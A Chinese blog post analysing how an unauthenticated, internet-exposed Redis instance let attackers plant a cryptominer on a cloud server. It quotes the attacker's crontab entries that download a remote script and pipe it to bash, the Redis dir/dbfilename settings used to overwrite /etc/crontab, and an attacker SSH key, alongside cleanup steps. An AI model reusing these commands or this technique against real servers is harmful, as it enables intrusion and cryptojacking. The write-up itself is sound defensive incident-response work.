redis未授权导致服务器被挖矿分析(20220119)

最新推荐文章于 2024-04-12 12:36:48 发布
最新推荐文章于 2024-04-12 12:36:48 发布
阅读量2.7k 收藏 2
点赞数 2
文章标签: 服务器 redis 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fr1d4st/article/details/122715127
版权

文章目录

0x00 背景

  • 20220119收到阿里云报警短信

【阿里云】尊敬的******:云盾云安全中心检测到您的服务器:xx.xx.xx.xx(**)出现了紧急安全事件:挖矿程序,建议您立即登录云安全中心控制台-安全告警处理http://a.aliyun.com/f1. 进行处理

  • 登录阿里云控制台后发现有多条异常记录
  1. 恶意脚本代码执行(curl -s -L http://xx.xx.xx.xx/f220115rr/java8.sh)2022-01-16 03:35:01
  2. ECS在非常用地登录(登录源IP: xx.xx.xx.xx)2022-01-16 06:28:26
  3. 挖矿程序(/tmp/.system/java/java8_8 (deleted))2022-01-19 16:22:52
  4. 挖矿程序(/tmp/.system/java/java8_8)2022-01-19 17:12:16

0x01 现象

  • 查看top进程中有java8_8进程占用大量CPU
  • 查看/etc/crontab文件中有如下内容:
*/30 * * * * root curl -fsSL http://xx.xx.xx.xx/f220115rr/java8.sh | bash 
*/30 * * * * root cd1 -fsSL http://xx.xx.xx.xx/f220115rr/java8.sh | bash
  • 查看~/.ssh/authorized_keys文件中有如下内容:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDWh4GJVPXi1DjSOxs4ytVtVT/XogOlBzAoWn5qE4yyO6EXRz1FhC+EVY9hmUcjMUN1Rp7dYZMLO1vsWhhpqmX9H0YWV2JfKixcXKE2eNrKxl45IRrhIRqNYzr/QnsmLdXZl5OLqoo587jwMCZeWB10NuOiUv5PKVCKUNtT2MQxKv/n5HleqY1Nn9uzFEiIkD39dmqm/4gKPbAcz3uXi31yVVSvUdmqoUoj8B/EdQn182z/Ix+WUJWAuYD2WTrhhYbcDvi+MSOm9ld7MgeOpxzLS
EJjEja4+2EHD7dkoNLMD9/UH4FW3yzt3kTUBdaeGJN0mndoex3IggihB5dMjuTnKp25iv6xzYXRCaupxnsRN2rYQlbda8+jZOTxF+nwRGeX9QeSthlQzzZyxEHT7USxQCBpvlyyTZJ9ugX/j11XkKdAGzmKZGo7F0Qxp173eL0SH+6roqrQcXL85r5OPjUd9Xt9fHz2zskN/urYcp6Oi+9kjQgWY0NcjMu/H5YaPP8= wolf@wolfs-MacBook-Pro.local
  • 查看~/.ssh/known_hosts文件中有如下内容:
xx.xx.xx.xx ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPXvwY3uGrEkEjGDHk/5uwdcx6MRXkqfBBbKOOBXvEyBvDbK9naV9v6IHH3aL5+sCNeTwhjPKHwy3ywf7TbDAe

0x02 临时处理

  • 尝试先杀掉java8_8进程,使用kill -9 $pid的方式,杀完后自定重启,怀疑有守护进程
  • 查看/tmp/.system/java/miner.sh文件:
#!/bin/bash
if ! pidof java8_8 >/dev/null; then
  nice /tmp/.system/java/java8_8 $*
else
  echo "RAPTOREUM miner is already running in the background. Refusing to run another one."
  echo "Run \"killall java8_8\" or \"sudo killall java8_8\" if you want to remove background miner first."
fi
  • 使用killall java8_8可以杀掉进程
  • 移除ssh-key登录:ssh-keygen -R xx.xx.xx.xx
  • 尝试删除/etc/crontab文件内容,发现文件为只读;使用chattr -ia /etc/crontab解除只读,然后直接rm /etc/crontab删除文件

0x03 溯源

系统架构为应用服务器+数据库服务器模式

数据库服务器开放的业务端口只有****(mysql)和****(redis),mysql直接被外部入侵的可能性不大,因此只有如下两种可能:**

  • 排查是否为应用程序服务器漏洞导致:

查看应用在2022-01-16 03:35:01的日志,并未找到异常;

  • 排除是否为redis漏洞:

redis开放了外网访问端口,并且未设置auth密码,被入侵可能性极大:

redis被入侵一般都是利用了redis的同步数据到硬盘机制写入文件

  1. 查看redis在2022-01-16 03:35:01的日志,发现有异常ip登录xx.xx.xx.xx;
  2. 查看redis中有3个异常key,分表为x1、x2、x3、x4,value值为:
*/3 * * * * root wdl -q -O- http://xx.xx.xx.xx/f220115rr/java8.sh|bash > /dev/null 2>&1
  1. 查看redis设置:
>config get dir
1) dir
2) /etc
>config get dbfilename
1) dbfilename
2) crontab

由此可以分析出,攻击者使用了redis覆盖/etc/crontab文件,写入定时任务,从远程服务器下载脚本并执行,同时修改系统中相关权限,防止进程被杀,达到一直执行挖矿程序的目的。

fr1d4st
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
由于redis暴露外网设置密码被挖矿问题处理
ZhengXinMing1998的博客
05-24 903
一、问题查找 接到腾讯云短信提醒,服务器可能被植入了挖矿程序。 1.于是top查看cpu占用,发现一个名为java8_8的程序会定时隔一段时间就占用系统特别高的cpu 2.检查系统中的定时任务 发现/etc/crontab文件中出现了可疑的定时任务,通过ip查找发现ip地址来自美国 3.检查系统启动项,发现启动项中确有java8_8-server,并且状态位enable的 二、问题处理 1.清除系统该进行的启动项:systemctl disable 服务名 2.查看进程的存储目录,rm -rf /
redis授权访问致远程植入挖矿脚本
煮酒闲谈
12-19 1748
前言遇到安全事件发生的时候,我们往往会有相应的处理流程与方法,但是作为一个萌新来说,对于安全事件的处理即应急响应还是比较陌生的,于是今天分享这样一篇文章。 安全应从小事做起,从细节做起 本文转载自<我的世界安全观>作者会不定期的更新一些与安全技术相关的干货,欢迎大家关注。1 安全事件描述1.1 开发服务器被勒索主机xx.xx.xx.xx出现异常:cpu高达700%,且登录出现访问外链的异常提醒:
外网安装redis操作不规范导致服务器挖矿,无奈之下重装
Irons_one的博客
01-03 906
服务器安装jdk,tomcat,mysql,redis 推荐使用一个工具:MobaXterm,一个上传文件和远程连接操作一体的软件 1. 安装JDK 用MobaXterm工具将jdk压缩包上传至服务器的一个文件夹中 解压 tar -xvf jdk-8u251-linux-x64.tar.gz -C /usr/java 配置环境变量:查看当前jdk路径 vi /etc/profile 配置完成保存退出 重新编译配置文件 source /etc/profile javac命令查看jdk环境是否配
新手使用Redis时,被挖矿组织偷袭
weixin_55166254的博客
10-20 566
本文大概分析了,当你打开Redis访问权限后,系统是如何被一步步入侵的过程,并记录了一下当被入侵后的一些措施,另外我的知识简单的处理,可能病毒仍清除干净,需要找更专业的文章进行排查
攻击者利用Redis授权访问漏洞进行新型入侵挖矿的事件分析
浪丶荡
09-30 1098
攻击者利用Redis授权访问漏洞进行新型入侵挖矿的事件分析 昨天我在博客中分享了自己服务器被攻击的一段病毒脚本——【谁干的】,安全方面不是很专业,只看懂了个大概,对着脚本将那些自动任务一一删除了,禁用了Redis对外开放,及时加了密码才使服务器能正常运转,上次的勒索病毒让我躲过了一劫,没想到这次因为自己的一时疏忽,竟然在第一时间就中招了……看看专业人士的分析吧 攻击者利用Redis授权访问漏洞...
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
Redis授权访问配合SSH key文件利用详解
09-09
总的来说,理解并实施这些安全最佳实践对于保护Redis服务器免受授权访问和相关攻击至关重要。在云环境中尤其需要注意,因为配置错误可能导致更大的安全风险。通过严格的安全策略和持续的监控,可以显著降低Redis...
python脚本实现Redis授权批量提权
09-09
本文将深入探讨如何利用 Python 脚本来针对授权Redis 实例进行批量提权。 首先,了解 Redis 的安全隐患至关重要。如果 Redis 配置不当,允许从任意 IP 访问且启用身份验证,攻击者可以轻易地连接到 Redis ...
基于Spring MVC + Spring + MyBatis的【学生管理管理系统】
最新发布
D1561691的博客
04-12 744
我还通过一些渠道整理了一些大厂真实面试主要有:蚂蚁金服、拼多多、阿里云、百度、唯品会、携程、丰巢科技、乐信、软通动力、OPPO、银盛支付、中国平安等初,中级,高级Java面试题集合,附带超详细答案,希望能帮助到大家。还有专门针对JVM、SPringBoot、SpringCloud、数据库、Linux、缓存、消息中间件、源码等相关面试题。《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取!帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
阿里云服务器Redis弱密码漏洞挖矿
清风思雨的博客
08-11 413
重启了三次,没办法,最后是通过重装了系统才解决的,就短短的半个小时,就被渗透,这速度。总之损失了很多文件,配置,数据库也没有被及时备份,唉,之前被SSH远程攻击上万次都没被打,被redis的漏洞半个小时沦陷,长个记性,以后注意!我尝试了网上的极多的解决方案,但是都没用了,这些黑客的手段也是不断更新迭代。定时任务我也改了,删了,再到病毒文件清空了,但是都无所事事,进程杀不死,CPU长时间100%。...
Linux Redis自动化挖矿感染蠕虫分析及安全建议
A_991128a的博客
01-11 397
自从Redis授权问题获取Linux系统root权限的攻击方法的披露后,由于其易用性,利用该问题入侵Linux服务进行挖矿、扫描等的黑客行为一直层出不穷;而在众多利用该问题入侵服务器进行黑产行为的案例中,其中就存在一类利用该问题进行挖矿并且会利用pnscan自动扫描感染其他机器;该类攻击一直存在,不过在近期又呈现数量增加的趋势,在最近捕获到多次,我们针对其做下具体的分析
由于Redis后门漏洞导致服务器被注入挖矿脚本解决过程
JolyouLu的博客
05-07 1572
由于Redis后门漏洞导致服务器被注入挖矿脚本解决过程 事件描述 某一天的早晨,我还是像往常一样搭着公交车开启打工仔的一天,一早8.30就到办公室了,坐着玩手机等上班,就这这时突然我组长飞快的回来办公室,回来就说快看看阿里云后台服务,服务是不是挂掉了,我当时就纳闷了一大早的流量不大怎么就宕机了呢,不一会我组长收到了阿里云短信通知监测到恶意脚本,接下来就是脚本的查找 前期处理 首先是通过阿里云的控制台发现,查看到恶意的进程PID,通过ps -ef | greap 5724的确看到了当前进程,前期处理我只
解决redis在linux(centos)下的一个挖矿漏洞
qq_34870166的博客
01-24 5537
redis挖矿漏洞
CPU被挖矿Redis竟是内鬼。
JavaMBa的博客
11-17 833
作者:轩辕之风 原文链接:https://www.cnblogs.com/xuanyuan/p/15564302.html 却说这一日,Redis正如往常一般工作,不久便收到了一条SAVE命令。 虽说这Redis常被用来当做缓存,数据只存在于内存中,却也能通过SAVE命令将内存中的数据保存到磁盘文件中以便持久化存储。 只见Redis刚打开文件,准备写入,不知何处突然冲出几个大汉将其擒住。 到底是怎么回事?Redis一脸懵。 这事还得要从一个月之前说起。 挖矿病毒 前情回顾:C..
Redis之轨迹】记录一次 Linux 服务器惨遭挖矿的经历 [kdevtmpfs](Redis 安全问题)
Ice__Clean的博客
09-30 410
Redis 漏洞说明 Redis 默认情况下,会绑定在 0.0.0.0:6379,在没有利用防火墙进行屏蔽的情况下,将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,将导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。 攻击者在授权访问 Redis 的情况下利用 Redis 的相关方法,可以成功将自己的公钥写入目标服务器的 ~/.ssh 文件夹的 authotrized_keys 文件中,进而可以直接登录目标服务器。如果Redis服务是以roo.
服务器Redis实例中挖矿病毒排查及处理
wejack的专栏
01-20 736
文章系转载,方便整理和归纳,源文地址 https://z.itpub.net/article/detail/E0D0607EFA91E5FA88035F74D040DD26 巧不巧的我的服务器也被挖矿了,应该就是这个方法搞的 却说这一日,Redis正如往常一般工作,不久便收到了一条SAVE命令。 虽说这Redis常被用来当做缓存,数据只存在于内存中,却也能通过SAVE命令将内存中的数据保存到磁盘文件中以便持久化存储。 只见Redis刚打开文件,准备写入,不知何处突然冲出几个大汉将其擒住。 到底是怎么回事.
阿里云服务器被[crypto]攻击导致CPU爆满(已解决)
大鹏
07-14 1658
缘由 之前玩Docker并开放了2375端口和redis 弱密码 且默认6379端口 的时候,安装时使用密码,然后还在阿里云开放了0.0.0.0的6379端口,导致出现了漏洞, 现象 被安装了Docker镜像且启用了容器运行。 Reids多了几条任务计划的缓存数据 /usr/share 目录下多了 5个文件 -rwxr-xr-x 1 root root 4563624 Jul 1 17:46 '[crypto]' -rw-r--r-- 1 root root 4384...
Redis授权漏洞复现,利用其实现的挖矿蠕虫脚本分析
qq_53689523的博客
05-05 855
Redis授权漏洞复现 挖矿蠕虫脚本分析 恶意代码分析实例
redis 挖矿木马清除
wasd986523的博客
06-03 776
redis 挖矿木马清除 https://www.360zhijia.com/anquan/447557.html https://github.com/MoreSecLab/DDG_MalWare_Clean_Tool
"Redis授权漏洞及基本操作总结
Redis授权访问风险是一种常见的安全漏洞,许多运维人员正确配置Redis服务器的访问权限,导致攻击者可以通过授权访问来获取敏感信息或执行恶意操作。在本文中,我将总结Redis授权访问风险及其对系统安全的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值